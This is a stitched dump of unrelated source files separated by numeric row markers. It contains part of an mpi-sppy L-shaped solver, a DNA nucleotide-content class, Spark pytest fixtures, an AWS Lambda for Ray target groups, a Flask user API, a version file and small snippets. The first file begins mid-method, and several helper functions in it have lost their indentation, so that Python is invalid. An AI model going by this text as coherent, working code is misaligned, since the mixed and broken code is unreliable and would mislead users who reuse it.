                linear_coefs.append(_mpisppy_probability*coef)
        # a quadratic term is second-stage if EITHER factor is second-stage
        for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
            id_x = id(x)
            id_y = id(y)
            if id_x not in nonant_ids or id_y not in nonant_ids:
                quadratic_coefs.append(_mpisppy_probability*coef)
                quadratic_vars.append((x,y))
        # checks if model sense is max, if so negates the objective
        if not self.is_minimizing:
            for i,coef in enumerate(linear_coefs):
                linear_coefs[i] = -coef
            for i,coef in enumerate(quadratic_coefs):
                quadratic_coefs[i] = -coef
        expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
                                linear_vars=linear_vars)
        if quadratic_coefs:
            expr += pyo.quicksum(
                (coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
            )
        instance.del_component(obj)
        # set subproblem objective function
        instance.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
        ## need to do this here for validity if computing the eta bound
        if self.relax_root:
            # relaxes any integrality constraints for the subproblem
            RelaxIntegerVars().apply_to(instance)
        if self.compute_eta_bound:
            # re-fix nonants and solve the subproblem once; its lower bound is
            # a valid lower bound for this scenario's eta variable
            for var in fixed_nonants:
                var.fixed = True
            opt = pyo.SolverFactory(self.options["sp_solver"])
            if self.options["sp_solver_options"]:
                for k,v in self.options["sp_solver_options"].items():
                    opt.options[k] = v
            if sputils.is_persistent(opt):
                set_instance_retry(instance, opt, scenario_name)
                res = opt.solve(tee=False)
            else:
                res = opt.solve(instance, tee=False)
            eta_lb = res.Problem[0].Lower_bound
            self.valid_eta_lb[scenario_name] = eta_lb
        # if not done above
        if not self.relax_root:
            # relaxes any integrality constraints for the subproblem
            RelaxIntegerVars().apply_to(instance)
        # iterates through constraints and removes first stage constraints from the model
        # the id dict is used to improve the speed of identifying the stage each variables belongs to
        for constr_data in list(itertools.chain(
                instance.component_data_objects(SOSConstraint, active=True, descend_into=True)
                , instance.component_data_objects(Constraint, active=True, descend_into=True))):
            if _first_stage_only(constr_data, nonant_ids):
                _del_con(constr_data)
        # creates the sub map to remove first stage variables from objective expression
        complicating_vars_map = pyo.ComponentMap()
        subproblem_to_root_vars_map = pyo.ComponentMap()
        # creates the complicating var map that connects the first stage variables in the sub problem to those in
        # the root problem -- also set the bounds on the subproblem root vars to be none for better cuts
        for var, rvar in zip(nonant_list, self.root_vars):
            if var.name not in rvar.name: # rvar.name may be part of a bundle
                raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
            complicating_vars_map[rvar] = var
            subproblem_to_root_vars_map[var] = rvar
            # these are already enforced in the root
            # don't need to be enfored in the subproblems
            var.setlb(None)
            var.setub(None)
            var.fixed = False
        # this is for interefacing with PH code
        instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
        if self.store_subproblems:
            self.subproblems[scenario_name] = instance
        return instance, complicating_vars_map
    def lshaped_algorithm(self, converger=None):
        """ function that runs the lshaped.py algorithm

        Builds the root problem, registers the subproblems with the Benders
        cut generator, then alternates root solves with cut generation until
        no new cuts are produced, a hub/converger signals convergence, or
        max_iter is reached. Returns the last root solver results object
        (None on ranks that never solve the root).
        """
        if converger:
            converger = converger(self, self.cylinder_rank, self.n_proc)
        # pull loop controls from options, falling back to defaults
        max_iter = 30
        if "max_iter" in self.options:
            max_iter = self.options["max_iter"]
        tol = 1e-8
        if "tol" in self.options:
            tol = self.options["tol"]
        verbose = True
        if "verbose" in self.options:
            verbose = self.options["verbose"]
        root_solver = self.options["root_solver"]
        sp_solver = self.options["sp_solver"]
        # creates the root problem
        self.create_root()
        m = self.root
        assert hasattr(m, "obj")
        # prevents problems from first stage variables becoming unconstrained
        # after processing
        _init_vars(self.root_vars)
        # sets up the BendersCutGenerator object
        m.bender = LShapedCutGenerator()
        m.bender.set_input(root_vars=self.root_vars, tol=tol, comm=self.mpicomm)
        # let the cut generator know who's using it, probably should check that this is called after set input
        m.bender.set_ls(self)
        # set the eta variables, removing this from the add_suproblem function so we can
        # Pass all the scenarios in the problem to bender.add_subproblem
        # and let it internally handle which ranks get which scenarios
        if self.has_root_scens:
            # scenarios embedded in the root are not Benders subproblems
            sub_scenarios = [
                scenario_name for scenario_name in self.local_scenario_names
                if scenario_name not in self.root_scenarios
            ]
        else:
            sub_scenarios = self.local_scenario_names
        for scenario_name in self.local_scenario_names:
            if scenario_name in sub_scenarios:
                subproblem_fn_kwargs = dict()
                subproblem_fn_kwargs['scenario_name'] = scenario_name
                m.bender.add_subproblem(
                    subproblem_fn=self.create_subproblem,
                    subproblem_fn_kwargs=subproblem_fn_kwargs,
                    root_eta=m.eta[scenario_name],
                    subproblem_solver=sp_solver,
                    subproblem_solver_options=self.options["sp_solver_options"]
                )
            else:
                # embedded in the root: just wire up the nonant var map
                self.attach_nonant_var_map(scenario_name)
        # set the eta bounds if computed
        # by self.create_subproblem
        self.set_eta_bounds()
        if self.cylinder_rank == 0:
            opt = pyo.SolverFactory(root_solver)
            if opt is None:
                raise Exception("Error: Failed to Create Master Solver")
            # set options
            for k,v in self.options["root_solver_options"].items():
                opt.options[k] = v
            is_persistent = sputils.is_persistent(opt)
            if is_persistent:
                set_instance_retry(m, opt, "root")
        t = time.time()
        res, t1, t2 = None, None, None
        # benders solve loop, repeats the benders root - subproblem
        # loop until no more cuts are generated
        # or the maximum iterations limit is reached
        for self.iter in range(max_iter):
            if verbose and self.cylinder_rank == 0:
                if self.iter > 0:
                    print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Time Spent on Last Master:", "%7.2f" % t1,
                          "Time Spent Generating Last Cut Set:", "%7.2f" % t2, "Current Objective:", "%7.2f" % m.obj.expr())
                else:
                    print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Current Objective: -Inf")
            t1 = time.time()
            # buffers for broadcasting the root solution to all ranks
            x_vals = np.zeros(len(self.root_vars))
            eta_vals = np.zeros(self.scenario_count)
            outer_bound = np.zeros(1)
            if self.cylinder_rank == 0:
                if is_persistent:
                    res = opt.solve(tee=False)
                else:
                    res = opt.solve(m, tee=False)
                # LShaped is always minimizing
                outer_bound[0] = res.Problem[0].Lower_bound
                for i, var in enumerate(self.root_vars):
                    x_vals[i] = var.value
                for i, eta in enumerate(m.eta.values()):
                    eta_vals[i] = eta.value
            self.mpicomm.Bcast(x_vals, root=0)
            self.mpicomm.Bcast(eta_vals, root=0)
            self.mpicomm.Bcast(outer_bound, root=0)
            if self.is_minimizing:
                self._LShaped_bound = outer_bound[0]
            else:
                # LShaped is always minimizing, so negate
                # the outer bound for sharing broadly
                self._LShaped_bound = -outer_bound[0]
            if self.cylinder_rank != 0:
                # load the broadcast root solution into the shadow root
                for i, var in enumerate(self.root_vars):
                    var._value = x_vals[i]
                for i, eta in enumerate(m.eta.values()):
                    eta._value = eta_vals[i]
            t1 = time.time() - t1
            # The hub object takes precedence over the converger
            # We'll send the nonants now, and check for
            # convergence
            if self.spcomm:
                self.spcomm.sync(send_nonants=True)
                if self.spcomm.is_converged():
                    break
            t2 = time.time()
            # solve subproblems at the current root point; empty list == converged
            cuts_added = m.bender.generate_cut()
            t2 = time.time() - t2
            if self.cylinder_rank == 0:
                for c in cuts_added:
                    if is_persistent:
                        opt.add_constraint(c)
                # NOTE(review): the rank-0 convergence break below is guarded
                # by `verbose`; with verbose=False rank 0 appears to keep
                # iterating while other ranks break -- confirm intended.
                if verbose and len(cuts_added) == 0:
                    print(
                        f"Converged in {self.iter+1} iterations.\n"
                        f"Total Time Elapsed: {time.time()-t:7.2f} "
                        f"Time Spent on Last Master: {t1:7.2f} "
                        f"Time spent verifying second stage: {t2:7.2f} "
                        f"Final Objective: {m.obj.expr():7.2f}"
                    )
                    self.first_stage_solution_available = True
                    self.tree_solution_available = True
                    break
                if verbose and self.iter == max_iter - 1:
                    print("WARNING MAX ITERATION LIMIT REACHED !!! ")
            else:
                if len(cuts_added) == 0:
                    break
            # The hub object takes precedence over the converger
            if self.spcomm:
                self.spcomm.sync(send_nonants=False)
                if self.spcomm.is_converged():
                    break
            if converger:
                converger.convergence_value()
                if converger.is_converged():
                    if verbose and self.cylinder_rank == 0:
                        print(
                            f"Converged to user criteria in {self.iter+1} iterations.\n"
                            f"Total Time Elapsed: {time.time()-t:7.2f} "
                            f"Time Spent on Last Master: {t1:7.2f} "
                            f"Time spent verifying second stage: {t2:7.2f} "
                            f"Final Objective: {m.obj.expr():7.2f}"
                        )
                    break
        return res
def _del_con(c):
parent = c.parent_component()
if parent.is_indexed():
parent.__delitem__(c.index())
else:
assert parent is c
c.parent_block().del_component(c)
def _del_var(v):
parent = v.parent_component()
if parent.is_indexed():
parent.__delitem__(v.index())
else:
assert parent is v
block = v.parent_block()
block.del_component(v)
def _get_nonant_ids(instance):
assert len(instance._mpisppy_node_list) == 1
# set comprehension
nonant_list = instance._mpisppy_node_list[0].nonant_vardata_list
return nonant_list, { id(var) for var in nonant_list }
def _get_nonant_ids_EF(instance):
assert len(instance._mpisppy_data.nlens) == 1
ndn, nlen = list(instance._mpisppy_data.nlens.items())[0]
## this is for the cut variables, so we just need (and want)
## exactly one set of them
nonant_list = list(instance.ref_vars[ndn,i] for i in range(nlen))
## this is for adjusting the objective, so needs all the nonants
## in the EF
snames = instance._ef_scenario_names
nonant_ids = set()
for s in snames:
nonant_ids.update( (id(v) for v in \
getattr(instance, s)._mpisppy_node_list[0].nonant_vardata_list)
)
return nonant_list, nonant_ids
def _first_stage_only(constr_data, nonant_ids):
    """ iterates through the constraint in a scenario and returns if it only
        has first stage variables
    """
    return all(id(var) in nonant_ids
               for var in identify_variables(constr_data.body))
def _init_vars(varlist):
    '''
    for every pyomo var in varlist without a value,
    sets it to the lower bound (if it exists), or
    the upper bound (if it exists, and the lower bound
    does not) or 0 (if neither bound exists).
    '''
    for var in varlist:
        if var.value is not None:
            continue  # already initialized
        bound = var.lb if var.lb is not None else var.ub
        if bound is not None:
            var.set_value(pyo.value(bound))
        else:
            var.set_value(0)
def main():
    """Solve the three-scenario farmer example with the L-shaped method."""
    import mpisppy.tests.examples.farmer as ref
    import os
    # Silence output from every rank except rank 0
    if MPI.COMM_WORLD.Get_rank() != 0:
        sys.stdout = open(os.devnull, 'w')

    scenario_names = ['scen' + str(i) for i in range(3)]
    # known valid eta lower bound for the farmer example
    bounds = {name: -432000 for name in scenario_names}
    options = {
        "root_solver": "gurobi_persistent",
        "sp_solver": "gurobi_persistent",
        "sp_solver_options" : {"threads" : 1},
        "valid_eta_lb": bounds,
        "max_iter": 10,
    }

    ls = LShapedMethod(options, scenario_names, ref.scenario_creator)
    res = ls.lshaped_algorithm()
    if ls.cylinder_rank == 0:
        print(res)
# run the farmer example only when executed as a script
if __name__ == '__main__':
    main()
| 30,944 | 9,175 |
'''
Created on Nov 16, 2011
@author: jcg
'''
from Features.Feature import Feature
import Functions
from uuid import uuid4
class NucleotideContent(Feature):
    """
    Nucleotide Content Feature
        solution - solution where nucleotide content should be computed
        label - some label to append to the name
        hi_range - start and end position to calculate nucleotide content - a tuple in the form (start, end)
        mutable_region - a list with all bases that can be mutated
        cds_region - a pair with begin and end of CDSs - example: (0,100)
        keep_aa - boolean option indicating if in the design mode amino acids should be kept
    """
    def __init__(self, nucleotideContentObject = None, solution=None, label="", args = { 'ntcontent_range' : (0,9),
                                                                                        'mutable_region' : None,
                                                                                        'cds_region' : None,
                                                                                        'keep_aa' : True }):
        if nucleotideContentObject is None:  # create new instance (was `== None`)
            # General properties of feature
            Feature.__init__(self, solution=solution, label=label)
            # Specifics of this Feature
            self.ntcontent_range = args['ntcontent_range']
            self.sequence = solution.sequence[self.ntcontent_range[0]:self.ntcontent_range[1]+1]
            # BUG FIX: dict.has_key() is Python-2-only (removed in Python 3);
            # the `in` operator is equivalent and works in both
            self.mutable_region = args['mutable_region'] if 'mutable_region' in args else solution.mutable_region
            self.cds_region = args['cds_region'] if 'cds_region' in args else solution.cds_region
            self.keep_aa = args['keep_aa'] if 'keep_aa' in args else solution.keep_aa
            self.set_scores()
            self.set_level()
        else:  # copy constructor
            Feature.__init__(self, nucleotideContentObject)
            self.ntcontent_range = nucleotideContentObject.ntcontent_range
            self.sequence = nucleotideContentObject.sequence
            self.mutable_region = nucleotideContentObject.mutable_region
            self.cds_region = nucleotideContentObject.cds_region
            self.keep_aa = nucleotideContentObject.keep_aa
            self.scores = nucleotideContentObject.scores

    def set_scores(self, scoring_function = Functions.analyze_ntcontent):
        """Score the working sequence and tag each score key with the label."""
        self.scores = Functions.appendLabelToDict(scoring_function(self.sequence), self.label)

    def mutate(self, operator=Functions.SimpleNtContentOperator):
        """Apply the mutation operator; returns a new Solution or None if
        there are no target instructions or the operator produced nothing."""
        if not self.targetInstructions:
            return None
        new_seq = operator(self.solution.sequence, self.targetInstructions['direction'], self.nucleotides, self.mutable_region, self.cds_region, keep_aa=self.keep_aa)
        if not new_seq:
            return None
        return Solution.Solution(sol_id=str(uuid4().int), sequence=new_seq, cds_region = self.cds_region, mutable_region = list(self.mutable_region), parent=self.solution, design=self.solution.designMethod)
class NucleotideContentAT(NucleotideContent):
    """
    AT-content feature: tracks the 'a' and 't' bases.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('at')
        self.set_level()
class NucleotideContentGC(NucleotideContent):
    """
    GC-content feature: tracks the 'g' and 'c' bases.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('gc')
        self.set_level()
class NucleotideContentA(NucleotideContent):
    """
    A-content feature: tracks the 'a' base only.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('a')
        self.set_level()
class NucleotideContentT(NucleotideContent):
    """
    T-content feature: tracks the 't' base only.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('t')
        self.set_level()
class NucleotideContentG(NucleotideContent):
    """
    G-content feature: tracks the 'g' base only.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('g')
        self.set_level()
class NucleotideContentC(NucleotideContent):
    """
    C-content feature: tracks the 'c' base only.
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self, nucleotideContentObject)
        self.nucleotides = list('c')
        self.set_level()
import Solution | 4,812 | 1,377 |
# NOTE(review): this looks like an IDE test fixture — "<caret>" appears to mark
# the editor caret position inside a "# type: int" comment; do not "fix" it.
x = 42 # ty<caret>pe: int
from argparse import Namespace
import pytest
from laplace_spark.app.smartstore_src_to_log0 import SparkAppSmartstoreSrcToLog0
from laplace_spark.constants import DATE_ID_COLUMN_NAME
from laplace_spark.modules.provider import Provider
from laplace_spark.modules.utils.laplace_utils import LaplaceUtils
from tests.utils import recursive_delete_s3_key
@pytest.fixture()
def spark_app_smartstore_src_to_log0(spark_session):
    """The Spark app under test, wired to the shared spark_session fixture."""
    app = SparkAppSmartstoreSrcToLog0(spark_session=spark_session)
    yield app
@pytest.fixture()
def data_category():
    """Data category shared by the tests."""
    yield "order"
@pytest.fixture()
def mall_id():
    """Dummy mall id shared by the tests."""
    yield "dummy_mall_id"
@pytest.fixture()
def login_type():
    """Login type shared by the tests."""
    yield "NAVER"
@pytest.fixture()
def mall_name():
    """Dummy mall name shared by the tests."""
    yield "dummy_mall_name"
@pytest.fixture()
def args(data_category, mall_id, login_type, mall_name):
    """CLI-style argument vector for the app's argument parser."""
    yield [
        "--data-category", data_category,
        "--mall-id", mall_id,
        "--login-type", login_type,
        "--mall-name", mall_name,
    ]
@pytest.fixture()
def args_namespace(data_category, mall_id, login_type, mall_name):
    """Pre-parsed argparse Namespace matching the `args` fixture."""
    parsed = Namespace(
        data_category=data_category,
        mall_id=mall_id,
        login_type=login_type,
        mall_name=mall_name,
    )
    yield parsed
@pytest.fixture()
def data_set_key(mall_id, login_type, mall_name):
    """Hash key the app derives from the mall identity fields."""
    utils = LaplaceUtils(provider=Provider.SMARTSTORE.value)
    identity = {
        "mall_id": mall_id,
        "login_type": login_type,
        "mall_name": mall_name,
    }
    yield utils.hash_creator(identity)
@pytest.fixture()
def smartstore_sourcing_delta_path(
    laplace_dashboard_bucket_name,
    df_smartstore_sourcing,
    s3,
):
    """Write the sourcing frame to S3 as a Delta table; delete it afterwards."""
    s3_key = "dummy"
    table_path = f"s3a://{laplace_dashboard_bucket_name}/{s3_key}"
    df_smartstore_sourcing.write.format("delta").save(table_path)
    yield table_path
    # teardown: remove everything written under the key
    recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, s3_key)
@pytest.fixture()
def smartstore_log0_different_schema_table_path(
    laplace_dashboard_bucket_name,
    df_smartstore_sourcing,
    s3,
):
    """Delta table whose schema lacks the date-id column, to exercise the
    schema-evolution path on write; deleted afterwards."""
    s3_key = "dummy"
    table_path = f"s3a://{laplace_dashboard_bucket_name}/{s3_key}"
    df_without_date_id = df_smartstore_sourcing.drop(DATE_ID_COLUMN_NAME)
    df_without_date_id.write.format("delta").save(table_path)
    yield table_path
    # teardown: remove everything written under the key
    recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, s3_key)
class TestClassSparkAppSmartstoreSrcToLog0:
    """Tests for SparkAppSmartstoreSrcToLog0: argument parsing, S3 path
    construction, and Delta read/write round-trips."""

    @staticmethod
    def _assert_same_rows(actual_rows, expected_rows):
        """Order-insensitive row comparison shared by the write tests
        (extracted from duplicated assertion blocks)."""
        assert all(row in expected_rows for row in actual_rows)
        assert all(row in actual_rows for row in expected_rows)

    def test_get_arg_parser_success(
        self,
        spark_app_smartstore_src_to_log0,
        args,
        data_category,
        mall_id,
        login_type,
        mall_name,
    ):
        """The parser round-trips all four CLI options."""
        arg_parser = spark_app_smartstore_src_to_log0.get_arg_parser()
        parsed = arg_parser.parse_args(args)

        assert parsed.data_category == data_category
        assert parsed.mall_id == mall_id
        assert parsed.login_type == login_type
        assert parsed.mall_name == mall_name

    def test_get_path_prefix_success(
        self,
        spark_app_smartstore_src_to_log0,
        mall_id,
        login_type,
        mall_name,
        data_category,
        data_set_key,
    ):
        """Path prefix is bucket/provider/hash-key/category."""
        path_prefix = spark_app_smartstore_src_to_log0.get_path_prefix(
            mall_id=mall_id,
            login_type=login_type,
            mall_name=mall_name,
            data_category=data_category,
        )

        assert path_prefix == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{data_category}"
        )

    def test_get_src_path_success(
        self, spark_app_smartstore_src_to_log0, args_namespace, data_set_key
    ):
        """Source path is the prefix plus the 'sourcing' suffix."""
        src_path = spark_app_smartstore_src_to_log0.get_src_path(args_namespace)

        assert src_path == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/sourcing"
        )

    def test_get_dest_path_success(
        self,
        spark_app_smartstore_src_to_log0,
        args_namespace,
        data_set_key,
    ):
        """Destination path is the prefix plus the 'log0' suffix."""
        dest_path = spark_app_smartstore_src_to_log0.get_dest_path(args_namespace)

        assert dest_path == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/log0"
        )

    def test_read_success(
        self,
        spark_app_smartstore_src_to_log0,
        smartstore_sourcing_delta_path,
        df_smartstore_sourcing,
    ):
        """Reading the Delta table returns the original schema and rows."""
        df = spark_app_smartstore_src_to_log0.read(smartstore_sourcing_delta_path)

        assert df.schema == df_smartstore_sourcing.schema
        assert df.collect() == df_smartstore_sourcing.collect()

    def test_write_success(
        self,
        spark_app_smartstore_src_to_log0,
        df_smartstore_sourcing,
        laplace_dashboard_bucket_name,
        spark_session,
    ):
        """Writing then reading back preserves schema and row multiset."""
        path = f"s3a://{laplace_dashboard_bucket_name}/"
        spark_app_smartstore_src_to_log0.write(path, df_smartstore_sourcing)

        df = spark_session.read.format("delta").load(path)
        assert df.schema == df_smartstore_sourcing.schema
        self._assert_same_rows(df.collect(), df_smartstore_sourcing.collect())

    def test_write_success_with_different_schema_existing(
        self,
        spark_app_smartstore_src_to_log0,
        df_smartstore_sourcing,
        smartstore_log0_different_schema_table_path,
        spark_session,
    ):
        """Writing over a table with a narrower schema evolves it and
        preserves the written rows."""
        spark_app_smartstore_src_to_log0.write(
            smartstore_log0_different_schema_table_path,
            df_smartstore_sourcing,
        )

        df = spark_session.read.format("delta").load(
            smartstore_log0_different_schema_table_path,
        )
        assert df.schema == df_smartstore_sourcing.schema
        self._assert_same_rows(df.collect(), df_smartstore_sourcing.collect())
import os
import json
import boto3
# boto3 clients used by the handlers below
ec2 = boto3.client('ec2')
elbv2 = boto3.client('elbv2')

# ALB target-group ARNs are supplied via the Lambda environment
MLFLOW_TARGET_GROUP_ARN = os.getenv('MLFLOW_TARGET_GROUP_ARN')
TENSORBOARD_TARGET_GROUP_ARN = os.getenv('TENSORBOARD_TARGET_GROUP_ARN')
RAY_DASHBOARD_TARGET_GROUP_ARN = os.getenv('RAY_DASHBOARD_TARGET_GROUP_ARN')
JUPYTER_TARGET_GROUP_ARN = os.getenv('JUPYTER_TARGET_GROUP_ARN')
PROMETHEUS_TARGET_GROUP_ARN = os.getenv('PROMETHEUS_TARGET_GROUP_ARN')
GRAFANA_TARGET_GROUP_ARN = os.getenv('GRAFANA_TARGET_GROUP_ARN')

# log the configuration at cold start
print(f'MLFLOW_TARGET_GROUP_ARN={MLFLOW_TARGET_GROUP_ARN}')
print(f'TENSORBOARD_TARGET_GROUP_ARN={TENSORBOARD_TARGET_GROUP_ARN}')
print(f'RAY_DASHBOARD_TARGET_GROUP_ARN={RAY_DASHBOARD_TARGET_GROUP_ARN}')
print(f'JUPYTER_TARGET_GROUP_ARN={JUPYTER_TARGET_GROUP_ARN}')
print(f'PROMETHEUS_TARGET_GROUP_ARN={PROMETHEUS_TARGET_GROUP_ARN}')
print(f'GRAFANA_TARGET_GROUP_ARN={GRAFANA_TARGET_GROUP_ARN}')

# map each target group to the service port it fronts
target_group_port_mappings = [
    {"target_group": arn, "port": port}
    for arn, port in (
        (MLFLOW_TARGET_GROUP_ARN, 5000),
        (TENSORBOARD_TARGET_GROUP_ARN, 6006),
        (RAY_DASHBOARD_TARGET_GROUP_ARN, 8265),
        (JUPYTER_TARGET_GROUP_ARN, 8888),
        (PROMETHEUS_TARGET_GROUP_ARN, 9090),
        (GRAFANA_TARGET_GROUP_ARN, 3000),
    )
]
def deregister_targets(instance_id):
    """Remove the instance from every configured target group."""
    for mapping in target_group_port_mappings:
        deregister_target(mapping['target_group'], instance_id, mapping['port'])
def register_targets(instance_id):
    """Add the instance to every configured target group."""
    for mapping in target_group_port_mappings:
        register_target(mapping['target_group'], instance_id, mapping['port'])
def deregister_target(target_group, instance_id, port):
    """Deregister one (instance, port) pair from an ALB target group."""
    print(f"Deregistering instance id={instance_id} and port={port} with target group={target_group}")
    targets = [{"Id": instance_id, "Port": port}]
    response = elbv2.deregister_targets(TargetGroupArn=target_group, Targets=targets)
    print(json.dumps(response))
def register_target(target_group, instance_id, port):
    """Register one (instance, port) pair with an ALB target group."""
    print(f"Registering instance id={instance_id} and port={port} with target group={target_group}")
    targets = [{"Id": instance_id, "Port": port}]
    response = elbv2.register_targets(TargetGroupArn=target_group, Targets=targets)
    print(json.dumps(response))
def is_ray_head_node(tags):
    """Return True iff the EC2 'Name' tag looks like a Ray head node
    (value of the form ray-*-head)."""
    for tag in tags:
        value = tag["Value"]
        is_name_tag = tag["Key"] == 'Name'
        if is_name_tag and value.startswith("ray-") and value.endswith("-head"):
            print(f'Tag value is {value}')
            return True
    return False
def lambda_handler(event, context):
    """React to EC2 instance state-change events: register a Ray head node's
    service ports with the ALB target groups when it starts running, and
    deregister them when it stops or terminates. Other instances and other
    states are ignored.
    """
    print(json.dumps(event))
    instance_id = event["detail"]["instance-id"]
    print(f'Instance ID: {instance_id}')
    # get the instance state from the message
    state = event["detail"]["state"]
    if state in ['running', 'terminated', 'stopped']:
        print("Getting instance details")
        response = ec2.describe_instances(InstanceIds=[instance_id])
        print(response)
        if response and len(response['Reservations']) > 0:
            instance_details = response['Reservations'][0]['Instances'][0]
            print("Instance details:")
            print(instance_details)
            instance_tags = instance_details['Tags']
            if is_ray_head_node(instance_tags):
                print("Processing head node")
                if state == 'running':
                    register_targets(instance_id)
                else:
                    deregister_targets(instance_id)
            else:
                # BUG FIX: message previously read "... not Ray head not so ignoring"
                print("Instance is not Ray head node so ignoring")
        else:
            print(f"Instance id: {instance_id} not found")
    else:
        print(f'Ignoring event {event["detail"]["state"]}')
| 3,962 | 1,429 |
from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
from marshmallow_sqlalchemy import ModelSchema
app = Flask(__name__)
# NOTE(review): the DB URI values here are placeholders; real credentials
# should come from environment/config, never be hard-coded.
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'
db = SQLAlchemy(app)
# Model
class User(db.Model):
    """ORM model for a row of the ``users`` table."""
    __tablename__ = "users"

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20))

    def __init__(self, username):
        self.username = username

    def __repr__(self):
        return f"{self.id}"

    def create(self):
        """Persist this instance in the current session and return it."""
        db.session.add(self)
        db.session.commit()
        return self
# Create the tables for all models defined above at import time.
db.create_all()
class UserSchema(ModelSchema):
    """Marshmallow schema for (de)serializing User rows."""
    class Meta(ModelSchema.Meta):
        model = User
        sqla_session = db.session
    # id is read-only in API payloads; username is mandatory on input.
    id = fields.Number(dump_only=True)
    username = fields.String(required=True)
@app.route('/api/v1/username', methods=['GET'])
def index():
    """Return every stored user as a JSON list."""
    schema = UserSchema(many=True)
    serialized = schema.dump(User.query.all())
    return make_response(jsonify({"list users ": serialized}))
@app.route('/api/v1/username/<id>', methods=['GET'])
def get_user_by_id(id):
    """Return a single user looked up by primary key."""
    schema = UserSchema()
    serialized = schema.dump(User.query.get(id))
    return make_response(jsonify({"user ": serialized}))
@app.route('/api/v1/username/<id>', methods=['PUT'])
def update_user_by_id(id):
    """Update a user's username from the JSON body; 404 if id is unknown."""
    data = request.get_json()
    get_user = User.query.get(id)
    if get_user is None:
        # Fix: an unknown id previously crashed with AttributeError (500);
        # report a clean 404 instead.
        return make_response(jsonify({"error": "user not found"}), 404)
    if data.get('username'):
        get_user.username = data['username']
    db.session.add(get_user)
    db.session.commit()
    user_schema = UserSchema(only=['id', 'username'])
    user = user_schema.dump(get_user)
    return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['DELETE'])
def delete_user_by_id(id):
    """Delete a user by primary key; 204 on success, 404 if not found."""
    get_user = User.query.get(id)
    if get_user is None:
        # Fix: deleting a missing id crashed in db.session.delete(None);
        # report a clean 404 instead.
        return make_response(jsonify({"error": "user not found"}), 404)
    db.session.delete(get_user)
    db.session.commit()
    return make_response("", 204)
@app.route('/api/v1/username', methods=['POST'])
def create_todo():
    """Create a new user from the posted JSON payload.

    (Function name kept as-is: it doubles as the Flask endpoint name.)
    """
    body = request.get_json()
    schema = UserSchema()
    new_user = schema.load(body)
    result = schema.dump(new_user.create())
    return make_response(jsonify({"user ": result}), 200)
if __name__ == "__main__":
    # Development entry point only; serve via a WSGI server in production.
    app.run(debug=True)
from model_utils import Choices
# Comparison operators: stored as small ints, displayed as symbols.
RELATIONS = Choices(
    (0, 'eq', '='),
    (1, 'ne', '!='),
    (2, 'gt', '>'),
    (3, 'lt', '<'),
    (4, 'ge', '>='),
    (5, 'le', '<='),
)
# Lifecycle states of a run.
STATUSES = Choices(
    ('NEW', 'New'),
    ('RUNNING', 'Running'),
    ('FINISHED', 'Finished'),
    ('ERROR', 'Error')
)
# Outcome of a finished run.
RESULTS = Choices(
    ('SUCCESS', 'Success'),
    ('WARNING', 'Warning'),
    ('FAILED', 'Failed')
)
# Kinds of checks: stored as ints, displayed as human-readable labels.
CHECK_TYPES = Choices(
    (0, 'SQL_QUERY', 'SQL query'),
    (1, 'SQL_EXPRESSION', 'SQL expression'),
    (2, 'NUMBER', 'Number'),
    (3, 'STRING', 'String'),
    (4, 'DATE', 'Date'),
    (5, 'PYTHON_EXPRESSION', 'Python expression'),
)
| 647 | 275 |
# Product versions live here (and only here). They should be bumped at every
# release.
#
# NOTE: This is parsable by both bazel and sh. Do not add arbitrary
# text here. Keep entries in NAME="value" form with no spaces around '='
# so both parsers accept them.
#
# Versions *must* adhere to semantic versioning rules. See http://semver.org/
#
# Don't forget to also update relevant docs and README.txt files. ;)
# This is the public-facing program release version of biograph and the SDK
BIOGRAPH_VERSION="7.1.2-dev"
# Use this version of the ML model from archive.spiralgenetics.com.
BIOGRAPH_MODEL_VERSION="7.1.0"
# SEQSET is the biograph file format version
SEQSET_VERSION="2.0.0"
# SpEC file format + program version
SPEC_VERSION="1.3.2-dev"
| 661 | 226 |
from typing import List
class Solution:
    def searchInsert(self, a: List[int], target: int) -> int:
        """Return the index of `target` in sorted `a`, or the index at which
        it would be inserted to keep `a` sorted.

        Fixes a crash on empty input: the original dereferenced `mid` after
        the loop, which is unbound when `a` is empty (NameError). After the
        loop `lo` is exactly the insertion point, so the two post-loop
        branches collapse to a single return.
        """
        lo, hi = 0, len(a) - 1
        # Standard binary search over the closed interval [lo, hi].
        while lo <= hi:
            mid = (lo + hi) // 2
            if a[mid] == target:
                return mid
            if a[mid] < target:
                lo = mid + 1
            else:
                hi = mid - 1
        # Not found: lo is the insertion point (also correct for a == []).
        return lo
| 523 | 153 |
# Interactive demo of input(), printing and string/int conversion.
name=input("hi, what's your name?")
age=input("how old are you?")
print("your name is ", name, "and you are ", age )
